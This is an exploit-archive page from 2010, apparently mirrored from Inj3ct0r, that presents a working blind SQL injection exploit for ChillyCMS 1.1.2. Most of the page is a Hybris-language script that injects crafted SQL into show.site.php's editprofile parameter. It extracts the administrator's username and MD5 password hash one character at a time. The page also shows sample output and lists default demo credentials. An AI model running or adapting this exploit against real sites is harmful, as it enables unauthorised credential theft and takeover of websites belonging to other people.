Home / os / win7

ChillyCMS Blind Sql Injection Vulnerability

Posted on 18 May 2010

<!DOCTYPE HTML PUBLIC '-//W3C//DTD HTML 4.01 Transitional//EN'><html><head><meta http-equiv='Content-Type' content='text/html; charset=windows-1251'><title>ChillyCMS Blind Sql Injection Vulnerability</title><link rel='shortcut icon' href='/favicon.ico' type='image/x-icon'><link rel='alternate' type='application/rss+xml' title='Inj3ct0r RSS' href='/rss'></head><body><pre>===========================================
ChillyCMS Blind Sql Injection Vulnerability
===========================================


#!/usr/bin/hybris
#################################################################################
#
# Exploit Title: ChillyCMS Blind Sql Injection
# Author: IHTeam
# Software Link:
http://chillycms.bplaced.net/chillyCMS/core/show.site.php?id=9
# Version: 1.1.2
# Tested on: Win/Linux
#
#
# Example:
# [simone@simons Advisories]$ hybris chillycms.hy
# Searching Username... :
# admin
# Searching MD5... :
# d033e22ae348aeb5660fc2140aec35850c4da997
#
#
# DEFAULT USERNAME AND PASSWORD:
# User: jens
# Pass: demo
#
# Thanks to evilsocket for Hybris
# http://www.hybris-lang.org/
#################################################################################
 
import std.*;
 
query1 = &quot;4/**/AND/**/(SELECT/**/SUBSTRING(&quot;;
query2 = &quot;)/**/FROM/**/system_users/**/limit/**/0,1)=char(&quot;;
 
chars =
[48:0,49:1,50:2,51:3,52:4,53:5,54:6,55:7,56:8,57:9,97:'a',98:'b',99:'c',100:'d',101:'e',102:'f'];
usr = &quot;&quot;;
password = &quot;&quot;;
 
i=1;
println(&quot;Searching Username... : &quot;);
while(1) {
found=false;
chrs = 'a' .. 'z';
foreach(char of chrs) {
_chrs = toint(char);
url =
&quot;/chillyCMS/core/show.site.php?editprofile&amp;mod=&quot;+query1+&quot;user,&quot;+i+&quot;,1&quot;+query2+_chrs+&quot;)&quot;;
html = http_get( &quot;http://localhost&quot;, url );
if (html ~= &quot;/name='user'/&quot;) {
usr += char;
i+=1;
found=true;
}
}
if (!found) {
break;
}
}
println(usr);
 
i=1;
println(&quot;Searching MD5... : &quot;);
while(1) {
found=false;
foreach(char of chars.keys()) {
url =
&quot;/chillyCMS/core/show.site.php?editprofile&amp;mod=&quot;+query1+&quot;pw,&quot;+i+&quot;,1&quot;+query2+char+&quot;)&quot;;
html = http_get( &quot;http://localhost&quot;, url );
if (html ~= &quot;/name='user'/&quot;) {
password += chars[char];
i+=1;
found=true;
}
}
if (!found) {
break;
}
}
println(password);
println();


# <a href='http://inj3ct0r.com/'>Inj3ct0r.com</a> [2010-05-18]</pre><script type='text/javascript'>var gaJsHost = (("https:" == document.location.protocol) ? "https://ssl." : "http://www.");document.write(unescape("%3Cscript src='" + gaJsHost + "google-analytics.com/ga.js' type='text/javascript'%3E%3C/script%3E"));</script><script type='text/javascript'>try{var pageTracker = _gat._getTracker("UA-12725838-1");pageTracker._setDomainName("none");pageTracker._setAllowLinker(true);pageTracker._trackPageview();}catch(err){}</script></body></html>

 

TOP

Malware :

Exploits :